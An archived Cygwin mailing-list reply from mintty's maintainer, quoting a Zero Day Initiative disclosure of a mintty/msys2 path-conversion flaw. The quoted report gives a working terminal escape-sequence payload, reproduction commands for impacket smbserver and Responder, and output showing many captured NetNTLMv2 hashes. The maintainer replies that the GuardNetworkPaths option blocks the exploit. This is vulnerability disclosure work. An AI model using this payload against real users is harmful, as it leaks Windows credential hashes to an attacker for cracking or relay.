delorie.com/archives/browse.cgi   search  
Mail Archives: cygwin/2024/08/16/14:57:42

DKIM-Filter: OpenDKIM Filter v2.11.0 delorie.com 47GIvgSu896883
Authentication-Results: delorie.com;
dkim=pass (1024-bit key, unprotected) header.d=cygwin.com header.i=@cygwin.com header.a=rsa-sha256 header.s=default header.b=d8UUxsa4
X-Recipient: archive-cygwin AT delorie DOT com
DKIM-Filter: OpenDKIM Filter v2.11.0 sourceware.org 4A4FE385F032
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=cygwin.com;
s=default; t=1723834660;
bh=oCNsDIJQmSrEFOof9byNrT7PhRYyJjzNb8AzaQeGpXI=;
h=Date:Subject:To:References:In-Reply-To:List-Id:List-Unsubscribe:
List-Archive:List-Post:List-Help:List-Subscribe:From:Reply-To:
From;
b=d8UUxsa4z3J8t3QdW1NTTo0wAS86YRv7jPtYWWZYnq2FlsVUwJ70Qd/GAKguxzhTy
kdGsjSxSxfIk0s9Hvya4X3HPFEDzlb2r3ZtmX1RvR0ev4hczyM3EaGjqvVLvpG3r0W
QK82pfsn0Xbopk2mZgrZqpcH/Gwzs6yUgUXDMq7g=
X-Original-To: cygwin AT cygwin DOT com
Delivered-To: cygwin AT cygwin DOT com
DMARC-Filter: OpenDMARC Filter v1.4.2 sourceware.org 804AB3858CDA
ARC-Filter: OpenARC Filter v1.0.0 sourceware.org 804AB3858CDA
ARC-Seal: i=1; a=rsa-sha256; d=sourceware.org; s=key; t=1723834600; cv=none;
b=Tx29JnW5W/sSwYrRkZUU08Qf4XGf/DDEsSdFmy6j0XuH429Mymla1VsMrKvaMVXEl3orDLihDZgsgSnwVCHl1+/ny82LbE4DY/aoUJscT0heUl4hWsYVR3Oth3VojklW/iP9Zg8PA76Xn4C/ocgj7UEbkOOfG0O7xcxvTrhRNjU=
ARC-Message-Signature: i=1; a=rsa-sha256; d=sourceware.org; s=key;
t=1723834600; c=relaxed/simple;
bh=mm5idhPadRBvoL0urx3QfU1Y6kQZ8pyr0KIib/fK5RM=;
h=DKIM-Signature:Message-ID:Date:MIME-Version:Subject:To:From;
b=JQ3kPJ/PvV8c0DYhzFQXg5LupXhiCpWQzWGvcaEMaalBCNLTa4ay1eMzsKU/L5EHBc8ZC9bjCjL1XKRNLW9gQG+JIVuOC5qCseTIH+SZ8Y1BWOuEP4vbN7ng9/fy4WPO1Par3bCVi9flM23AZGrSTozq5BMW+XXHAjyH49fbtjA=
ARC-Authentication-Results: i=1; server2.sourceware.org
X-UI-Sender-Class: 55c96926-9e95-11ee-ae09-1f7a4046a0f6
Message-ID: <febc84e3-e14c-4b74-a28f-0bddcd3b79c2@towo.net>
Date: Fri, 16 Aug 2024 20:56:32 +0200
MIME-Version: 1.0
User-Agent: Mozilla Thunderbird
Subject: Re: ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation
Information Disclosure Vulnerability
To: cygwin AT cygwin DOT com
References: <DM5PR0102MB34771F931BA1B90A126291DE80812 AT DM5PR0102MB3477 DOT prod DOT exchangelabs DOT com>
Autocrypt: addr=towo AT towo DOT net; keydata=
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 kQ==
In-Reply-To: <DM5PR0102MB34771F931BA1B90A126291DE80812@DM5PR0102MB3477.prod.exchangelabs.com>
X-Provags-ID: V03:K1:s+AXXMS4uvrGfYYVgFIpTFcYXQyfVIqDMDnppkd5C1RM89yZVe7
QYGGnkXM7KmzzoLzmwbTwkXYQVzTkwX9QFmUhfsxWXs22qjKxtC7nqQe1FprwOWSJI6soev
WvPc3jpB3ZsYL9AY37HkkkHQ5q9T+NahsOCTgpqBOpq+u49DwGV2COwZY74f98olNz6eUdp
mnnur1StUmuldW4qSyq5w==
UI-OutboundReport: notjunk:1;M01:P0:w/zZSvuRgiM=;D/uY8LD6Bi3/jAso/v7NmB5by7A
qx2UybtSkjsuuAly93Z0lCbm7YYyhWp8fL6dtZs8Xg1cN1DOnGrdJrXuXRQqCu0APbAodcprn
7kJZGC532S06cfvwzTvy/o9qEvSfZZWOEMunce8IZ0bWtPoCSRu+sNQW90EcyD/OcnZQoY3yc
cc0w4mjXAiKczN/I0VNaTHzoiGcbQwc/7H0TdwNG8LslBhIDlaH4Q9/YHbLwFHGkt/XSCsi6S
rIhuaNE74m4gQQL3b+SguvQgjcLj175UPvRVK/4hM6Rg8TrR9+AK22RBw6kXbvLXv7/dIugOs
aADZfAvGtpB8bp90dyeyZloa0UvFyQkYveNpPwC4n5cbGPTvG1sZSh9HE0UQi8vg1JDZzy+rD
m44NtoM69O0zrSoT07P1rfXihOYVdmx0eHLkFgcb3nT8975LSZD8gl61MtDVF3UPsODbv8X1i
csenddEWG/97o1iT4aVRfpfy8MNlsLVplaDtplB78d5/KFWkF8yzSG5Cs5vw/VSuNf7M4w8SA
ZGaWCtyFK2mJQWrfpnKRl7OgGeZfwSBs2bcU0o6v9iCCe/IkEoFgXSS7XzCEU+qpsf66qTkSu
oDkJHzhlmk8Ji7Toqj/HNN0WqA6walWz+efTMlWYOnkyG2OI7vIhzyAiBhT2013D0XrwThl6W
p+kDzgaBuT7rwug+G5WVk8Nmkml8aHD0RGYtHtD2wd6jhoiejgrR0bgKD0CH79KzebIsi1vCb
VeCoELM4kq8LhkqWoDBmc8Df3djVYnfpg==
X-Spam-Status: No, score=0.5 required=5.0 tests=BAYES_40, DKIM_SIGNED,
DKIM_VALID, DKIM_VALID_AU, DKIM_VALID_EF, KAM_ASCII_DIVIDERS, KAM_LOTSOFHASH,
RCVD_IN_DNSWL_NONE, SPF_HELO_NONE, SPF_PASS, TXREP, T_SCC_BODY_TEXT_LINE,
WEIRD_PORT autolearn=no autolearn_force=no version=3.4.6
X-Spam-Checker-Version: SpamAssassin 3.4.6 (2021-04-09) on
server2.sourceware.org
X-BeenThere: cygwin AT cygwin DOT com
X-Mailman-Version: 2.1.30
List-Id: General Cygwin discussions and problem reports <cygwin.cygwin.com>
List-Unsubscribe: <https://cygwin.com/mailman/options/cygwin>,
<mailto:cygwin-request AT cygwin DOT com?subject=unsubscribe>
List-Archive: <https://cygwin.com/pipermail/cygwin/>
List-Post: <mailto:cygwin AT cygwin DOT com>
List-Help: <mailto:cygwin-request AT cygwin DOT com?subject=help>
List-Subscribe: <https://cygwin.com/mailman/listinfo/cygwin>,
<mailto:cygwin-request AT cygwin DOT com?subject=subscribe>
From: Thomas Wolff via Cygwin <cygwin AT cygwin DOT com>
Reply-To: Thomas Wolff <towo AT towo DOT net>
Errors-To: cygwin-bounces~archive-cygwin=delorie DOT com AT cygwin DOT com
Sender: "Cygwin" <cygwin-bounces~archive-cygwin=delorie DOT com AT cygwin DOT com> 

Am 16.08.2024 um 16:25 schrieb zdi-disclosures--- via Cygwin:
> The attachment could not be scanned for viruses because it is a password protected file.
> ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability
???
> -- CVSS -----------------------------------------
>
> 5.3: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
>
> -- ABSTRACT -------------------------------------
>
> Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:
> Mintty - Mintty
>
> -- VULNERABILITY DETAILS ------------------------
> * Version tested:3.7.1 (Git-2.45.2-64-bit.exe)
> * Installer file:Git-2.45.2-64-bit.exe
> * Platform tested:win11 23h2 [Version 10.0.22631.3593]
>
> ---
>
> ### Analysis
>
> ```
> Several escape sequences can cause the mintty process to access a file in a specific path,
> It is triggered by simply printing them out on bash, eg. \x1b]7773;//0.0.0.0/test\007
> An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host.
> NetNTLMv2 hashes can be used to Pass the Hash, or password cracking using tools like hashcat or johntheripper.
>
> It's caused by an api provided by msys2.
> The api is used to convert between posix and windows paths, but it also checks for symbolic links, which is enough to trigger the vulnerability.
> The same code is forked from cygwin, so it could also be theoretically vulnerable,
>
> In the exploit, It used the escape code for setting the terminal icon OSC 7773,
> but it can be done with other escape codes as well.
> For example, there's an escape code for indicating the cwd of the shell,
> which can lead to mintty `stat`ing the directory, which is sufficient for exploitation.
> ```
>
> The following cover most of the escape codes that could be exploited:
> ```
> - OSC I / OSC 7773
> - OSC 440
> - OSC 11
> - OSC 7
> - OSC 8
> ```
Since mintty 3.7.0, option GuardNetworkPaths and its default setting
prevents this exploit.
Thomas

> The call stack is roughly the following:
> ```
> mintty:
> src/winmain.c:308 - guardpath
> src/charset.c:1104 - path_posix_to_win_w
> msys2:
> cygwin_create_path (depends on mintty's compilation flags, but it calls cygwin_conv_path regardless)
> winsup/cygwin/path.cc:3909 - cygwin_conv_path
> winsup/cygwin/path.cc:660 - path_conv::check
> ```
>
> `path_conv::check` calls several windows apis that cause a connection to a remote path to be initiated.
>
>
>
> Here is the reproduce steps.
>
> Setup an attacker vm (Linux based) and a victim vm (windows).
>
> Modify the payload for the appropriate ip address (attacker vm's ip):
>
> ```
> \x1b]7773;//0.0.0.0/test\007
> ```
>
> On the Attacker's machine run either [impacket](https://github.com/fortra/impacket)'s smbserver.py or [Responder](https://github.com/lgandx/Responder) with smb server enabled:
>
> ```
> sudo smbserver.py -ts -smb2support test .
> ```
>
> ```
> sudo ./Responder.py -I enp1s0 -v
> ```
>
> Replace `enp1s0` with the proper interface.
>
> Make sure that other smb services aren't running:
>
> ```
> systemctl status smbd.service
> systemctl status nmbd.service
> ```
>
> Print the adjusted payload from the beginning in mintty (git-bash.exe).
>
> The victim's hash should be printed by impacket or Responder.
>
>
>
>
> Here is the output from responder
> ```
> [+] Listening for events...
>
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:38cf5ca194861c7c:05F329D7F39AEFE3C744671936ABC00E:010100000000000000D29167A9CCDA0195D8F1578A8B58C30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:331cb34ad722601a:F71C80EE1309C62CA4FF8E254A7AC1AE:010100000000000000D29167A9CCDA0142C3153183B226600000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:b5bc3a6e83c4d7d7:40218E62EF8DCA0023C166B568781059:010100000000000000D29167A9CCDA01797E79F388A237B30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:ae5464fd841bcab6:F76567E68408F2B04E41B869711E76F8:010100000000000000D29167A9CCDA01E0A7FFF1FF381FA60000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:3bd0a49004b53416:F21B104294C18C82464FEDDC572E6231:010100000000000000D29167A9CCDA01BAAEF54AF54B72560000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:c089b70c3accfaf7:E6B708A8DA76027A16E76F79F5F24333:010100000000000000D29167A9CCDA01433CAD8EC5BCC31A0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:daa3eae276eaef28:AE4059F544451A21F5779DFB3192D9DA:010100000000000000D29167A9CCDA0110F73C1AE7035F2B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:56c7b5b6c66d156a:96665824D373D99E5F043EFE7724BCF1:010100000000000000D29167A9CCDA012F33E5442DE0DDD40000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:44db8723d9666e80:2DAC87BC05CCECEB4BC8BFD8A9ED2317:010100000000000000D29167A9CCDA014DFB0815892812720000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:4f6f6e6df73e1d2c:884C66B57E2711811EE502E0796E8138:010100000000000000D29167A9CCDA0148213EEACAF1B7200000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:f1f9c2482522cd95:A0790CFB87DD01F4E10F57F94D487109:010100000000000000D29167A9CCDA01F1D6F8F5882213640000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:0a070bdf7688033f:C4B1F0D2CF4B23B7475AAB780FBCB685:010100000000000000D29167A9CCDA01C53624960CE78E120000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:e8f874be1a16042c:255BDD064E5A8C080FC3E0438A1D3502:010100000000000000D29167A9CCDA01F2A0B31CD1B4EB190000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:b7e3a6f69f1ba3dc:4FBC3B5E8781619637C21E21575EB522:010100000000000000D29167A9CCDA0161610316FA9D3D4E0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> [SMB] NTLMv2-SSP Client   : 172.16.16.237
> [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi
> [SMB] NTLMv2-SSP Hash     : zdi::DESKTOP-QAVUII5:9bceb9d050c9b28f:1618EE69D7DEA633EBD38C27ACC89190:010100000000000000D29167A9CCDA01D3E44752D8FA554B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000
> ```
>
> procmon log
> ```
> Date:   7/8/2024 2:07:57.3678237 PM
> Thread: 4844
> Class:  File System
> Operation:      CreateFile
> Result: ACCESS DENIED
> Path:   \\[attacker IP]\test007\
> Duration:       0.0112557
> Desired Access: Read EA, Read Attributes, Read Control
> Disposition:    Open
> Options:        Open Reparse Point
> Attributes:     n/a
> ShareMode:      Read, Write, Delete
> AllocationSize: n/a
>
> Description:
> Company:
> Name:   bash.exe
> Version:
> Path:   C:\Program Files\Git\usr\bin\bash.exe
> Command Line:   "C:\Program Files\Git\usr\bin\bash.exe" --login -i
> PID:    6172
> Parent PID:     1844
> Session ID:     1
> User:   DESKTOP-QAVUII5\wmliang
> Auth ID:        00000000:0015a222
> Architecture:   64-bit
> Virtualized:    False
> Integrity:      Medium
> Started:        7/8/2024 2:07:57 PM
> Ended:  7/8/2024 2:07:57 PM
> Modules:
> bash.exe        0x100400000     0x245000        C:\Program Files\Git\usr\bin\bash.exe                   1/14/2024 5:25:36 AM
> msys-2.0.dll    0x210040000     0x1227000       C:\Program Files\Git\usr\bin\msys-2.0.dll       Red Hat 3.4.10-87d5722901e1172a57aa4d4e3db84fbafe70d19b 2/14/2024 4:11:38 PM
>
> 0       FLTMGR.SYS      FltGetStreamContext + 0x20cb    0xfffff8045abe961b      C:\Windows\System32\drivers\FLTMGR.SYS
> 1       FLTMGR.SYS      FltGetStreamContext + 0x1b51    0xfffff8045abe90a1      C:\Windows\System32\drivers\FLTMGR.SYS
> 2       FLTMGR.SYS      FltRequestFileInfoOnCreateCompletion + 0x4ef    0xfffff8045ac21f6f      C:\Windows\System32\drivers\FLTMGR.SYS
> 3       ntoskrnl.exe    IofCallDriver + 0x55    0xfffff80455c29b45      C:\Windows\system32\ntoskrnl.exe
> 4       ntoskrnl.exe    ProbeForWrite + 0x40fe  0xfffff8045619c8be      C:\Windows\system32\ntoskrnl.exe
> 5       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1844   0xfffff804560cc9e4      C:\Windows\system32\ntoskrnl.exe
> 6       ntoskrnl.exe    ObOpenObjectByNameEx + 0x1f2    0xfffff804560cb392      C:\Windows\system32\ntoskrnl.exe
> 7       ntoskrnl.exe    NtCreateFile + 0x4c1    0xfffff80456194311      C:\Windows\system32\ntoskrnl.exe
> 8       ntoskrnl.exe    NtCreateFile + 0x79     0xfffff80456193ec9      C:\Windows\system32\ntoskrnl.exe
> 9       ntoskrnl.exe    setjmpex + 0x9045       0xfffff80455e2d505      C:\Windows\system32\ntoskrnl.exe
> 10      ntdll.dll       NtCreateFile + 0x14     0x7ffb3fdf03f4  C:\Windows\System32\ntdll.dll
> 11      msys-2.0.dll    setpassent + 0x2ff3     0x2100929c3     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 12      msys-2.0.dll    cygwin_split_path + 0x2c68      0x210096988     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 13      msys-2.0.dll    sigfillset + 0x6935     0x2100c40a5     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 14      msys-2.0.dll    sigfillset + 0x7f98     0x2100c5708     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 15      msys-2.0.dll    sigfillset + 0x9f81     0x2100c76f1     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 16      msys-2.0.dll    timegm + 0x4db  0x210193f2b     C:\Program Files\Git\usr\bin\msys-2.0.dll
> 17      <unknown>       0x110000000     0x110000000
>
> ```
>
>
> -- CREDIT ---------------------------------------
